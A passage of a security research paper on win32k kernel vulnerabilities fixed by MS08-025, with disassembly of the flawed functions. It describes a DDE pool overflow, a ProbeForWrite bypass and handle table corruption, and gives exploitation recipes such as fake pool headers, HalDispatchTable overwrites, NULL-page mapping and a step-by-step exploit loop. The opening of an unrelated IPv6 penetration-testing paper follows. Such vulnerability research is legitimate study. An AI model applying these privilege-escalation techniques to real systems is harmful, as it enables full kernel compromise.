needed information. The win32k driver has a callback system to do the exact
|
||||
opposite. The KeUsermodeCallback function calls a user-mode function from
|
||||
kernel-mode. This function is undocumented and provided by the kernel module
|
||||
in a secure way in order to switch into user-mode properly. The win32k driver
|
||||
uses this functionality for common task such as loading a dll module for event
|
||||
catching or retrieving information. The prototype of this function:
|
||||
|
||||
NTSTATUS KeUserModeCallback (
|
||||
IN ULONG ApiNumber,
|
||||
IN PVOID InputBuffer,
|
||||
IN ULONG InputLength,
|
||||
OUT PVOID *OutputBuffer,
|
||||
IN PULONG OutputLength
|
||||
);
|
||||
|
||||
Microsoft did not make a system to retrieve arbitrary user-mode function
|
||||
addresses from the kernel. Instead, the win32k driver has a set of functions
|
||||
that it needs to call. This list is kept in an undocumented function table in
|
||||
the Process Environment Block (PEB) structure for each process. The ApiNumber
|
||||
argument refers to an index into this table.
|
||||
|
||||
In order to return on user-mode, KeUserModeCallback retrieves the user-mode
|
||||
stack address from saved user-mode context stored in a thread's KTRAP_FRAME
|
||||
structure. It saves current stack level and uses ProbeForWrite to check if
|
||||
there is enough room for the input buffer. The Inputbuffer argument is then
|
||||
copied into the user stack and an argument list is created for the function
|
||||
being called. The KiCallUserMode function prepares the return in user-mode by
|
||||
saving important information in the kernel stack. This callback system works
|
||||
as a normal syscall exit procedure except than stack level and eip register
|
||||
has been changed. The callback start in the KiUserCallbackDispatcher function.
|
||||
|
||||
VOID KiUserCallbackDispatcher(
|
||||
IN ULONG ApiNumber,
|
||||
IN PVOID InputBuffer,
|
||||
IN ULONG InputLength
|
||||
);
|
||||
|
||||
The user-mode function KiUserCallbackDispatcher receives an argument list
|
||||
which contains ApiNumber, InputBuffer, and InputLength. It does appropriate
|
||||
function dispatching using the PEB dispatch table. When it is finished the
|
||||
routine invokes interrupt 0x2b to transfer control back to kernel-mode. In
|
||||
turn, the kernel inspects three registers:
|
||||
|
||||
- ecx: contains a user-mode pointer for OutputBuffer
|
||||
- edx: is for OutputLength
|
||||
- eax: contains return status.
|
||||
|
||||
The KiCallbackReturn kernel-mode function handles the 0x2B interrupt and
|
||||
passes important registers as argument for the NtCallbackReturn function.
|
||||
Everything is cleaned using saved information within the kernel stack and it
|
||||
transfers to previously called KeUsermodeCallback function with proper output
|
||||
argument sets.
|
||||
|
||||
The reader should notice that nothing is done to check ouput data. Each kernel
|
||||
function that uses the user-mode callback system is responsible for verifying
|
||||
output data. An attacker can simply hook the KiUserCallbackDispatcher
|
||||
function and filter requests to control output pointer, size and data. This
|
||||
user-mode call can represent an important issue if it was not verified as
|
||||
seriously as system call functions.
|
||||
|
||||
3) Discovery and exploitation
|
||||
|
||||
The win32k driver was patched by the MS08-025 bulletin[1]. This bulletin did
|
||||
not disclose any details about the issues but it did talk about a
|
||||
vulnerability which allows privilege elevation though invalid kernel checks.
|
||||
This patch increases the overall driver security by adding multiple
|
||||
verifications. In fact, this patch was due to three different reported
|
||||
vulnerabilities. The following sections explain how these vulnerabilities were
|
||||
discovered and exploited.
|
||||
|
||||
3.1) DDE Kernel pool overflow
|
||||
|
||||
The Dynamic Data Exchange (DDE) protocol is a GUI integrated message system .
|
||||
Despite Windows operating system has already many different message
|
||||
mechanisms, this one share data across process by sharing GUI handles and
|
||||
memory section. This feature is quite old but still supported by Microsoft
|
||||
application as Internet explorer and used in application firewalls bypass
|
||||
technique. During author's research on win32k driver, he investigated how the
|
||||
KeUsermodeCallback function was used. As described previously, this function
|
||||
does not verify directly output data. This lack of validation is what leads
|
||||
to this vulnerability.
|
||||
|
||||
3.1.1) Vulnerability details
|
||||
|
||||
The vulnerability exists in the xxxClientCopyDDEIn1 win32k function. It is
|
||||
not called directly but it is used internally in the kernel when messages are
|
||||
exchanged between processes using the DDE protocol. In this context, the
|
||||
OutputBuffer verification is analyzed.
|
||||
|
||||
In xxxClientCopyDDEIn1 function:
|
||||
|
||||
lea eax, [ebp+OutputLength]
|
||||
push eax
|
||||
lea eax, [ebp+OutputBuffer]
|
||||
push eax
|
||||
push 8 ; InputLength
|
||||
lea eax, [ebp+InputBuffer]
|
||||
push eax
|
||||
push 32h ; ApiNumber
|
||||
call ds:__imp__KeUserModeCallback@20
|
||||
mov esi, eax ; return < 0 (error ?)
|
||||
call _EnterCrit@0
|
||||
cmp esi, edi
|
||||
jl loc_BF92C6D4
|
||||
|
||||
cmp [ebp+OutputLength], 0Ch ; Check output length
|
||||
jnz loc_BF92C6D4
|
||||
|
||||
mov [ebp+ms_exc.disabled], edi ; = 0
|
||||
mov edx, [ebp+OutputBuffer]
|
||||
mov eax, _Win32UserProbeAddress
|
||||
cmp edx, eax ; Check OutputBuffer address
|
||||
jb short loc_BF92C5DC
|
||||
|
||||
[...]
|
||||
|
||||
loc_BF92C5DC:
|
||||
mov ecx, [edx]
|
||||
loc_BF92C5DE:
|
||||
mov [ebp+var_func_return_value], ecx
|
||||
or [ebp+ms_exc.disabled], 0FFFFFFFFh
|
||||
push 2
|
||||
pop esi
|
||||
cmp ecx, esi ; first OutputBuffer ULONG must be 2
|
||||
jnz loc_BF92C6D4
|
||||
xor ebx, ebx
|
||||
inc ebx
|
||||
mov [ebp+ms_exc.disabled], ebx ; = 1
|
||||
mov [ebp+ms_exc.disabled], esi ; = 2
|
||||
mov ecx, [edx+8] ; OutputBuffer - user mode ptr
|
||||
cmp ecx, eax ; Win32UserProbeAddress - check user mode ptr
|
||||
jnb short loc_BF92C602
|
||||
|
||||
[...]
|
||||
|
||||
loc_BF92C602:
|
||||
push 9
|
||||
pop ecx
|
||||
mov esi, eax
|
||||
lea edi, [ebp+copy_output_data]
|
||||
rep movsd
|
||||
mov [ebp+ms_exc.disabled], ebx ; = 1
|
||||
push 0
|
||||
push 'EdsU'
|
||||
mov ebx, [ebp+copy_output_data.copy1_size] ; we control this
|
||||
mov eax, [ebp+copy_output_data.copy2_size] ; and this
|
||||
lea eax, [eax+ebx+24h] ; integer overflow right here
|
||||
push eax ; NumberOfBytes
|
||||
call _HeavyAllocPool@12
|
||||
mov [ebp+allocated_buffer], eax
|
||||
test eax, eax
|
||||
jz loc_BF92C6B6
|
||||
|
||||
mov ecx, [ebp+var_2C]
|
||||
mov [ecx], eax ; save allocation addr
|
||||
push 9
|
||||
pop ecx
|
||||
lea esi, [ebp+copy_output_data]
|
||||
mov edi, eax
|
||||
rep movsd ; Copy output data
|
||||
test ebx, ebx
|
||||
jz short loc_BF92C65A
|
||||
|
||||
mov ecx, ebx
|
||||
mov esi, [ebp+copy_output_data.copy1_ptr]
|
||||
lea edi, [eax+24h]
|
||||
mov edx, ecx
|
||||
shr ecx, 2
|
||||
rep movsd ; copy copy1_ptr (with copy1_size)
|
||||
mov ecx, edx
|
||||
and ecx, 3
|
||||
rep movsb
|
||||
|
||||
loc_BF92C65A:
|
||||
mov ecx, [ebp+copy_output_data.copy2_size]
|
||||
test ecx, ecx
|
||||
jz short loc_BF92C676
|
||||
mov esi, [ebp+copy_output_data.copy2_ptr]
|
||||
lea edi, [ebx+eax+24h]
|
||||
mov edx, ecx
|
||||
shr ecx, 2
|
||||
rep movsd movsd ; copy copy2_ptr (with copy2_size)
|
||||
mov ecx, edx
|
||||
and ecx, 3
|
||||
rep movsb
|
||||
|
||||
The DDE copydata buffer contains two different buffers with their respective
|
||||
sizes. These sizes are used to calculate the size of a buffer that is
|
||||
allocated. However, appropriate checks are not made to detect if an integer
|
||||
overflow occurs. An integer overflow exists when an arithmetic operation is
|
||||
done between different integers that would go behind maximum integer value and
|
||||
then create a lower integer. As such, the allocated buffer may be smaller than
|
||||
each buffer size which leads to a kernel pool overflow. The pool is the name
|
||||
used to designated the Windows kernel heap.
|
||||
|
||||
3.1.2) Pool overflow exploitation
|
||||
|
||||
The key to exploiting this issue is more about how to exploit a kernel pool
|
||||
overflow. Previous work has described the kernel pool system and
|
||||
exploitation[8,9]. This paper will focus on the exploiting the vulnerability
|
||||
being described.
|
||||
|
||||
The kernel pool can be thought of as a heap. Memory is allocated by the
|
||||
ExAllocatePoolWithTag function and then freed using the ExFreePoolWithTag
|
||||
function. Depending of memory size, a header chunk precedes memory data.
|
||||
Exploiting a pool overflow involves replacing the next chunk header with a
|
||||
crafted version. This header is available though ntoskrnl module symbols as:
|
||||
|
||||
typedef struct _POOL_HEADER
|
||||
{
|
||||
union
|
||||
{
|
||||
struct
|
||||
{
|
||||
USHORT PreviousSize : 9;
|
||||
USHORT PoolIndex : 7;
|
||||
USHORT BlockSize : 9;
|
||||
USHORT PoolType : 7;
|
||||
}
|
||||
ULONG32 Ulong1;
|
||||
}
|
||||
union
|
||||
{
|
||||
struct _EPROCESS* ProcessBilled;
|
||||
ULONG PoolTag;
|
||||
struct
|
||||
{
|
||||
USHORT AllocatorBackTraceIndex;
|
||||
USHORT PoolTagHash;
|
||||
}
|
||||
}
|
||||
} POOL_HEADER, *POOL_HEADER; // sizeof(POOL_HEADER) == 8
|
||||
|
||||
Size fields are a multiple of 8 bytes as an allocated block will always be 8
|
||||
byte aligned. Windows 2000 pool architecture is different. Memory blocks are
|
||||
aligned on 16 bytes and flags type is a simple UCHAR (no bitfields). The
|
||||
PoolIndex field is not important for our overflow and can be set to 0. The
|
||||
PoolType field contains chunk state with multiple possible flags. The busy
|
||||
flag changes between operating system version but free chunk always got the
|
||||
PoolType field to zero.
|
||||
|
||||
During a pool overflow, the next chunk header is overwritten with malicious
|
||||
values. When the allocated block is freed, the ExFreePoolWithTag function will
|
||||
look at the next block type. If the next block is free it is coalesced by
|
||||
unlinking and merging it with current block. The LIST_ENTRY structure links
|
||||
blocks together and is adjacent to the POOL_HEADER structure if current chunk
|
||||
is free. The unlinking procedure is exactly the same as the behavior of the
|
||||
user-mode heap except that no safe unlinking check is done. This procedure is
|
||||
repeated for previous block. Many papers already explained unlinking
|
||||
exploitation which allows writing 4 bytes to a controlled address. However,
|
||||
this attack breaks a pool's internal linked list and exploitation must take
|
||||
this into consideration. As such, it is necessary to restore the pool's list
|
||||
integrity to prevent the system from crashing.
|
||||
|
||||
There are a number of different addresses that may be overwritten such as
|
||||
directly modifying code or overwriting the contents of a function pointer. In
|
||||
local kernel exploitation, the target address should be uncommonly unused by
|
||||
the kernel to prevent operating system instability. In his paper, Ruben
|
||||
Santamarta used a function pointer accessible though an exported kernel
|
||||
variable named HalDispatchTable[10]. This function pointer is used by
|
||||
KeQueryIntervalProfile which is called by the system call
|
||||
NtQueryIntervalProfile. Overwriting the function pointer at HalDispatchTable+4
|
||||
does not break system behavior as this function is unsupported. A clean
|
||||
privilege escalation code should consider restoring overwritten data. in
|
||||
default configuration. For our exploitation, this is the best choice as it is
|
||||
easy to launch and target.
|
||||
|
||||
The exploitation code for this this particular vulnerability should produce
|
||||
this fake chunk:
|
||||
|
||||
Fake next pool chunk header for Windows XP / 2003:
|
||||
|
||||
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 8
|
||||
PoolIndex = 0
|
||||
BlockSize = (sizeof(POOL_HEADER) + 8) / 8
|
||||
PoolType = 0 // Free chunk
|
||||
|
||||
Flink = Execute address - 4 // in userland - call +4 address
|
||||
Blink = HalDispatchTable + 4 // in kernelland
|
||||
|
||||
Modification for Windows 2000 support:
|
||||
|
||||
PreviousSize = (copy1_size + sizeof(POOL_HEADER)) / 16
|
||||
BlockSize = (sizeof(POOL_HEADER) + 15) / 16
|
||||
|
||||
The Flink field points on a user-mode address less 4 that will be called from
|
||||
the kernel address space once the Blink function pointer would be replaced.
|
||||
When called by the kernel, the user-mode address will execute at ring0 and is
|
||||
able to modify operating system behavior.
|
||||
|
||||
In this specific vulnerability, to avoid a crash and control copied data in
|
||||
target memory buffer, copy2ptr should point to a NOACCESS memory page. When
|
||||
the copy occurs, an exception will be raised which will be caught by a
|
||||
try/except block in the function. For this exception, the allocated buffers
|
||||
are freed. Copied memory size would be controlled by copy1size field and
|
||||
integer overflow will be done by copy2size field. This configuration allows to
|
||||
overflow only the necessary part.
|
||||
|
||||
3.1.3) Delayed free pool overflow on Windows Vista
|
||||
|
||||
The allocation pool type in win32k on Windows Vista uses an undocumented
|
||||
DELAY_FREE flag. With this flag, the ExFreePoolWithTag function does not
|
||||
liberate a memory block but instead pushes it into a deferred free list. If
|
||||
the kernel needs more memory or the deferred free list is full it will pop an
|
||||
entry off the list and liberate it through normal means. This can cause
|
||||
problems because the actual free may not occur until many minutes later in a
|
||||
potentially different process context. Due to this problem, both Flink and
|
||||
Blink pointers must be in the kernel mode address space.
|
||||
|
||||
The HalDispatchTable overwrite technique can be reused to support this
|
||||
configuration. The KeQueryIntervalProfile function disassembly shows how the
|
||||
function pointer is used. This context is always the same across Windows
|
||||
versions.
|
||||
|
||||
mov [ebp+var_C], eax
|
||||
lea eax, [ebp+arg_0]
|
||||
push eax
|
||||
lea eax, [ebp+var_C]
|
||||
push eax
|
||||
push 0Ch
|
||||
push 1
|
||||
call off_47503C ; xHalQuerySystemInformation(x,x,x,x)
|
||||
|
||||
The first and the second arguments points into user-mode in the NULL page.
|
||||
This page can be allocated using the NtAllocateVirtualMemory function with an
|
||||
unaligned address in NULL page. The kernel function will realign this pointer
|
||||
on lower page and allocate this page. This page is also used in kernel NULL
|
||||
dereference vulnerabilities. In order to exploit this context, a stub of
|
||||
machine code must be found which returns on first argument and where next 4
|
||||
bytes can be overwritten. This is the case of function epilogues as for wcslen
|
||||
function:
|
||||
|
||||
.text:00463B4C sub eax, [ebp+arg_0]
|
||||
.text:00463B4F sar eax, 1
|
||||
.text:00463B51 dec eax
|
||||
.text:00463B52 pop ebp
|
||||
.text:00463B53 retn
|
||||
.text:00463B54 db 0CCh ; alignement padding
|
||||
.text:00463B55 db 0CCh
|
||||
.text:00463B56 db 0CCh
|
||||
.text:00463B57 db 0CCh
|
||||
.text:00463B58 db 0CCh
|
||||
|
||||
In this example, the 00463B51h address fits our needs. The pop instruction
|
||||
pass the return address and the retn instruction return in 1. The alert
|
||||
reader noticed that the selected address start at dec instruction. The
|
||||
unlinking procedure unlinks the next 4 bytes and the 00463B54h address has 5
|
||||
padding bytes. Without this padding, overwriting unknown assembly could lead
|
||||
to a crash compromising the exploitation. The location of this target address
|
||||
changes depending on operating system version but this type of context can be
|
||||
found using pattern matching. On Windows Vista, the vulnerability exploitation
|
||||
loops calling the NtQueryIntervalProfile function until deferred free occurs
|
||||
and exploitation is successful. This loop is mandatory as pool internal
|
||||
structure must be corrected.
|
||||
|
||||
3.2) NtUserfnOUTSTRING kernel overwrite vulnerability
|
||||
|
||||
The NtUserfnOUTSTRING function is accessible through an internal table used by
|
||||
NtUserMessageCall exported function. Functions starting by "NtUserfn" can be
|
||||
called with SendMessage function exported by user32.dll module. For this
|
||||
function the WM_GETTEXT window message is necessary. Notice that in some cases
|
||||
a direct call is needed for successful exploitation. Verifications made by
|
||||
SendMessage function are trivial as it is used for different functions but
|
||||
should be considered. The MSDN website describes SendMessage utilization .
|
||||
|
||||
3.2.1) Evading ProbeForWrite function
|
||||
|
||||
The ProbeForWrite function verifies that an address range resides in the
|
||||
user-mode address space and is writable. If not, it will raise an exception
|
||||
that can be caught by a try / except code block. This function is used by a
|
||||
lot by drivers which deal with user-mode inputs. THe following is the start of
|
||||
the ProbeForWrite function assembly:
|
||||
|
||||
void __stdcall ProbeForWrite(PVOID Address, SIZE_T Length, ULONG Alignment)
|
||||
|
||||
mov edi, edi
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
mov eax, [ebp+Length]
|
||||
test eax, eax
|
||||
jz short loc_exit ; Length == 0
|
||||
|
||||
[...]
|
||||
|
||||
loc_exit:
|
||||
pop ebp
|
||||
retn 0Ch
|
||||
|
||||
This short assembly dump underlines one way to evade ProbeForWrite function.
|
||||
If Length argument is zero, no verification is done on Address argument. It
|
||||
means that Microsoft considers that a zero length input do not require address
|
||||
to point in userland. Microsoft made a blog post on MS08-025[12] and why
|
||||
ProbeForWrite was not modified as expected. Microsoft compatibility concern is
|
||||
understandable but at least ProbeForWrite documentation should be updated for
|
||||
this case.
|
||||
|
||||
3.2.2) Vulnerability details
|
||||
|
||||
This vulnerability touches not only this function but a whole class of string
|
||||
management functions. Some functions make sure that length argument is not
|
||||
zero before its modification. Others do not even check the length argument. A
|
||||
proof of concept has been made on this vulnerability by Ruben Santamarta[11].
|
||||
|
||||
The NtUserfnOUTSTRING function vulnerability evades the ProbeForWrite function
|
||||
and overwrites 1 or 2 bytes of kernel memory. This function disassembly is
|
||||
below:
|
||||
|
||||
In NtUserfnOUTSTRING (WM_GETTEXT)
|
||||
|
||||
xor ebx, ebx
|
||||
inc ebx
|
||||
push ebx ; Alignment = 1
|
||||
and eax, ecx ; eax = our size | ecx = 0x7FFFFFFF
|
||||
push eax ; If our size is 0x80000000 then
|
||||
; Length is zero (avoid any check)
|
||||
push esi ; Our kernel address
|
||||
call ds:__imp__ProbeForWrite@12
|
||||
or [ebp+var_4], 0FFFFFFFFh
|
||||
mov eax, [ebp+arg_14]
|
||||
add eax, 6
|
||||
and eax, 1Fh
|
||||
push [ebp+arg_10]
|
||||
lea ecx, [ebp+var_24]
|
||||
push ecx
|
||||
push [ebp+arg_8]
|
||||
push [ebp+arg_4]
|
||||
push [ebp+arg_0]
|
||||
mov ecx, _gpsi
|
||||
call dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function
|
||||
mov edi, eax
|
||||
test edi, edi
|
||||
jz loc_BF86A623 ; Something goes wrong
|
||||
|
||||
[...]
|
||||
|
||||
loc_BF86A623:
|
||||
cmp [ebp+arg_8], eax ; Submit size was 0 ? (no)
|
||||
jz loc_BF86A6D1
|
||||
|
||||
[...]
|
||||
|
||||
push [ebp+arg_18] ; Wide or Multibyte mode
|
||||
push esi ; Our address
|
||||
call _NullTerminateString@8 ; <== 0 byte or short overwriting
|
||||
|
||||
In this function, a high size (0x80000000) can bypass ProbeForWrite function
|
||||
verification. After this verification, it calls a function based on win32k
|
||||
internal function pointer table. This function depends of the calling context.
|
||||
If it is in the same thread that submitted handle it will go directly on
|
||||
retrieval function, otherwise it can be cached by another function waiting for
|
||||
proprietary thread handling this request. This assembly sample highlights null
|
||||
byte overwriting if other functions failed. The null byte assures that a valid
|
||||
string is returned. This is not the only way to overwrite memory. By using an
|
||||
edit box, we could overwrite kernel memory with a custom string but the first
|
||||
way fit the need.
|
||||
|
||||
The exploitation is trivial and will not be detailed in this part. The first
|
||||
vulnerability already exposed a target address and the way to allocate the
|
||||
NULL page which were used to demonstrate this vulnerability.
|
||||
|
||||
3.3) LoadMenu handle table corruption
|
||||
|
||||
The win32k driver implements its own handle mechanism. This system shares a
|
||||
handle table between user-mode and kernel-mode. This table is mapped into the
|
||||
user mode address space as read-only and is modified in kernel mode address
|
||||
space. The MS07-017 bulletin found by Cesar Cerrudo during Month of Kernel
|
||||
Bugs (MOKB) [13] describes this table and how its modification could permit kernel
|
||||
code execution. This chapter addresses another vulnerability based on GDI
|
||||
handle shared table entry misuse.
|
||||
|
||||
3.3.1) Handle table
|
||||
|
||||
In the GUI architecture, an handle contains different information as an index
|
||||
in the shared handle table and the object type. The handle table is an array
|
||||
of the undocumented HANDLE_TABLE_ENTRY structure.
|
||||
|
||||
typedef struct _HANDLE_TABLE_ENTRY
|
||||
{
|
||||
union
|
||||
{
|
||||
PVOID pKernelObject;
|
||||
ULONG NextFreeEntryIndex; // Used on free state
|
||||
};
|
||||
WORD ProcessID;
|
||||
WORD nCount;
|
||||
WORD nHandleUpper;
|
||||
BYTE nType;
|
||||
BYTE nFlag;
|
||||
PVOID pUserInfo;
|
||||
} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12
|
||||
|
||||
The nType field defines the table entry type. A free entry has the type zero
|
||||
and nFlag field which defines if it is destroyed or currently in destroy
|
||||
procedure. Normal handle verification routines check this value before getting
|
||||
pKernelInfo field which points to the associated kernel handle. In a free
|
||||
entry, the NextFreeEntryIndex field contains the next free entry index which
|
||||
is not a pointer but a simple unsigned long value.
|
||||
|
||||
The GUI object structure depends of object type but starts with the same
|
||||
structure which contains corresponding index in the shared handle table. This
|
||||
architecture lies on both elements. It switches between each table entry and
|
||||
kernel object depending of needs. A security issue exists if the handle table
|
||||
is not used as it should.
|
||||
|
||||
3.3.2) Vulnerability details
|
||||
|
||||
The vulnerability itself exists in win32k's xxxClientLoadMenu function which
|
||||
does not correctly validate a handle index. This function is called by the
|
||||
GetSystemMenu function and returns to user-mode using the KeUsermodeCallback
|
||||
function to retrieve a handle index. The following assembly shows how this
|
||||
value is used.
|
||||
|
||||
and eax, 0FFFFh ; eax is controlled
|
||||
lea eax, [eax+eax*2] ; index * 3
|
||||
mov ecx, gSharedTable
|
||||
mov edi, [ecx+eax*4] ; base + (index * 12)
|
||||
|
||||
This assembly sample uses an unchecked handle index and return pKernelObject
|
||||
field value of target entry. This pointer is returned by the xxxClientLoadMenu
|
||||
function. Proper verification are not made which permit deleted handle
|
||||
manipulation. A deleted handle has its NextFreeEntryIndex field set between
|
||||
0x1 and 0x3FFF. The return value will be in first memory pages.
|
||||
|
||||
A system menu is linked to a window object. This window object is designated
|
||||
by an handle passed as an argument of the GetSystemMenu function. The
|
||||
spmenuSys field of the window object is set with the returned value of the
|
||||
xxxClientLoadMenu function. In this specific context, the spmenuSys value is
|
||||
hardly predictable inside the NULL page. During thread exit, the Window
|
||||
liberation will look at spmenuSys object and using its index in the shared
|
||||
table, toggle nFlag field state to destroyed and nType as free. In the case
|
||||
the NULL page is filled with zero value, it will destroy the first entry in
|
||||
the GDI shared handle table.
|
||||
|
||||
Exploitation is achieved by reusing vulnerable functions once the first entry
|
||||
has been destroyed. The GetSystemMenu function locks and unlocks the GDI
|
||||
shared handle table entry linked with kernel object returned by the
|
||||
xxxClientLoadMenu function. If the entry flag is destroyed the unlock function
|
||||
calls the type destroy callback. For the first entry, the flag has been set to
|
||||
destroyed. There is no callback for this type as it is not supposed to be
|
||||
unlocked. The unlock function will call zero which allows kernel code
|
||||
execution. This specific handle management architecture stay undocumented.
|
||||
The purpose of liberation callback inside the thread unlocking procedure is
|
||||
unusual.
|
||||
|
||||
Exploitation steps:
|
||||
|
||||
1. Allocate NULL address
|
||||
2. Exploitation loop - second iteration trigger call zero:
|
||||
a. Create a dialog
|
||||
b. Set NULL page data to zero
|
||||
c. Set a relative jmp at zero address
|
||||
d. Create a menu graphic handle (or another type).
|
||||
e. Destroy this menu handle
|
||||
f. Call GetSystemMenu
|
||||
g. Intercept user callback and return destroyed menu handle index (mask 0x3fff of the handle)
|
||||
h. Exit this thread - set zero handle entry as free and destroyed.
|
||||
|
||||
There are multiple ways to exploit this vulnerability. The author truly
|
||||
believes that exploiting the locking procedure could be used on handle leak
|
||||
vulnerabilities as it was for this vulnerability. Indeed this vulnerability
|
||||
exploitation stays complex and unusual. This specific context made
|
||||
exploitation even more interesting.
|
||||
|
||||
4) GUI architecture protection
|
||||
|
||||
Create a safe software is a hard task that is definitely harder than find
|
||||
vulnerabilities. This work is even harder when it concerns old components
|
||||
which must respect compatibility rules. This article does not blame Microsoft
|
||||
for those vulnerabilities; it presents global issues on Windows architecture.
|
||||
In Windows Vista, Microsoft starts securing its operating system
|
||||
environment. The Windows Vista base code is definitely safer than it was.
|
||||
Some kernel components as the win32k driver are not safe enough and should
|
||||
be considered as a priority in local operating system security.
|
||||
|
||||
The GUI architecture does not respect security basics. Starting from scratch
|
||||
would certainly be a good option if it was possible. The global organization
|
||||
of this driver make security audits a mess. In the other hand, the Windows API
|
||||
shows it responses developer needs. There is a big abstraction layer between
|
||||
userland API and kernel functions. It can be use to rebuild the win32k driver
|
||||
without breaking compatibility. The API must follow user needs and be as easy
|
||||
as it can be. There is no reason that kernel driver exported function could
|
||||
not be changed in a secure way. It represents an enormous work which would be
|
||||
achieved only across operating system version. Nevertheless this is necessary.
|
||||
This modification could also increase performance by reducing unneeded context
|
||||
switching. There is no clever reason going in the kernel to ask userland a
|
||||
value that will be returned to userland. The user-mode callback system does
|
||||
not fit in a consistent GUI architecture.
|
||||
|
||||
Local exploitation techniques also highlight unsecure components as kernel
|
||||
pool and how overwriting some function pointers allow kernel code execution.
|
||||
In the past, the userland has been hardened as exploitation was too easy and
|
||||
third parties software could permit compromising a computer. The kernel
|
||||
performance is critical and adds verification routines and security measure
|
||||
could break this advantage. The solution should be in operating system
|
||||
evolution which does not restrict user experience. The hardware improvement
|
||||
does not forgive that modern operating system requires more resources than
|
||||
before.
|
||||
|
||||
Software development follows fastest way except when a specific result is
|
||||
expected. A company does not search the better way but something that cost
|
||||
less for almost the same result. Microsoft did not choose readiness by
|
||||
starting Security Development Lifecycle (SDL)[14] and should continue in this
|
||||
way.
|
||||
|
||||
5) Conclusion
|
||||
|
||||
The Windows kernel components have unequal security verification level. The
|
||||
main kernel module (ntoskrnl.exe) respects a standard verification dealing
|
||||
with userland data. The win32k driver does not follow the same rules which
|
||||
creates messy verification algorithms. This driver has an important
|
||||
interaction with userland by different mechanism from usual syscall to
|
||||
userland callback system. This architecture increase attack surface. The
|
||||
vulnerable parts do not concern usual vulnerabilities but also internal
|
||||
mechanism as GUI handle system.
|
||||
|
||||
Chapter exposed vulnerabilities discovery and exploitation. Local
|
||||
exploitation has many different attack vectors. Nowadays, the exploitation is
|
||||
fast and sure, it works at any attempts. The kernel exploitation is possible
|
||||
though different techniques.
|
||||
|
||||
The win32k driver was not built with a secure design and now it becomes so
|
||||
huge, with so many compatibility restrictions, that every release just
|
||||
implements new features without changing anything else. Windows Vista
|
||||
introduces many modifications but most of them are just automatic integer
|
||||
overflow checks. It will solve many unknown issues but interaction between
|
||||
user-mode and kernel-mode is hardly predictable. Vulnerabilities are not
|
||||
always a matter of proper checks but also system interaction and custom
|
||||
context.
|
||||
|
||||
Implementing usual userland protections is not a good solution as kernel
|
||||
exploitation is larger than overflows. The win32k driver could change by using
|
||||
userland abstract layer in order to keep compatibility. This choice is not the
|
||||
easier as it asks more time and work. The patch evoked in this paper
|
||||
ameliorates a little bit win32k security as it goes deeper than reported
|
||||
vulnerabilities. However the Windows Vista version of the win32k driver was
|
||||
concerned by two vulnerabilities even if it was already more secure. Minor
|
||||
modifications do not solve security issues. The overall kernel security has
|
||||
been discussed on different paper about vulnerabilities but also rootkits.
|
||||
Everyone agree that operating systems must evolve. Windows Seven could
|
||||
introduce a new right architecture which secure critical component or just
|
||||
improve win32k driver security.
|
||||
|
||||
References
|
||||
|
||||
[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025
|
||||
http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
|
||||
|
||||
[2] Microsoft Corporation. Windows User Interface.
|
||||
http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx
|
||||
|
||||
[3] Microsoft Corporation. SendMessage function.
|
||||
http://msdn.microsoft.com/en-us/library/ms644950.aspx
|
||||
|
||||
[4] ivanlef0u. You failed (blog entry about KeUsermodeCallback function in French).
|
||||
http://www.ivanlef0u.tuxfamily.org/?p=68
|
||||
|
||||
[5] Microsoft Corporation. About Dynamic Data Exchange.
|
||||
http://msdn.microsoft.com/en-us/library/ms648774.aspx
|
||||
|
||||
[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in ie7).
|
||||
http://support.microsoft.com/kb/160957
|
||||
|
||||
[7] Wikipedia. Integer overflow.
|
||||
http://en.wikipedia.org/wiki/Integeroverflow
|
||||
|
||||
[8] mxatone and ivanlef0u. Stealth hooking : Another way to subvert the Windows kernel.
|
||||
http://www.phrack.org/issues.html?issue=65&id=4#article
|
||||
|
||||
[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008).
|
||||
http://www.syscan.org/hk/indexhk.html
|
||||
|
||||
[10] Ruben Santamarta. Exploiting common flaws in drivers.
|
||||
http://www.reversemode.com/index.php?option=comremository&Itemid=2&func=fileinfo&id=51
|
||||
|
||||
[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n).
|
||||
http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1
|
||||
|
||||
[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities.
|
||||
http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx
|
||||
|
||||
[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation.
|
||||
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
|
||||
|
||||
[14] Microsoft Corporation. Steve Lipner and Michael Howard. The Trustworthy Computing Security Development Lifecycle
|
||||
http://msdn.microsoft.com/en-us/library/ms995349.aspx
|
484
uninformed/10.4.txt
Normal file
484
uninformed/10.4.txt
Normal file
|
@ -0,0 +1,484 @@
|
|||
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
|
||||
10/2008
|
||||
H D Moore
|
||||
hdm@metasploit.com
|
||||
|
||||
Abstract: This paper illustrates how IPv6-enabled systems with link-local and
|
||||
auto-configured addresses can be compromised using existing security tools.
|
||||
While most of the techniques described can apply to "real" IPv6 networks, the
|
||||
focus of this paper is to target IPv6-enabled systems on the local network.
|
||||
|
||||
Acknowledgments: The author would like to thank Van Hauser of THC for his
|
||||
excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack
|
||||
Toolkit. Much of the background information in this paper is based on notes
|
||||
from Van Hauser's presentation. The 'alive6' tool included with the IPv6
|
||||
Attack Toolkit is the critical first step for all techniques described in this
|
||||
paper. The author would like to thank Philippe Biondi for his work on SCAPY
|
||||
and for his non-traditional 3-D presentation on IPv6 routing headers at
|
||||
CanSecWest 2007.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The next iteration of the IP protocol, version 6, has been "just around the
|
||||
corner" for nearly 10 years. Migration deadlines have come and gone,
|
||||
networking vendors have added support, and all modern operating systems are
|
||||
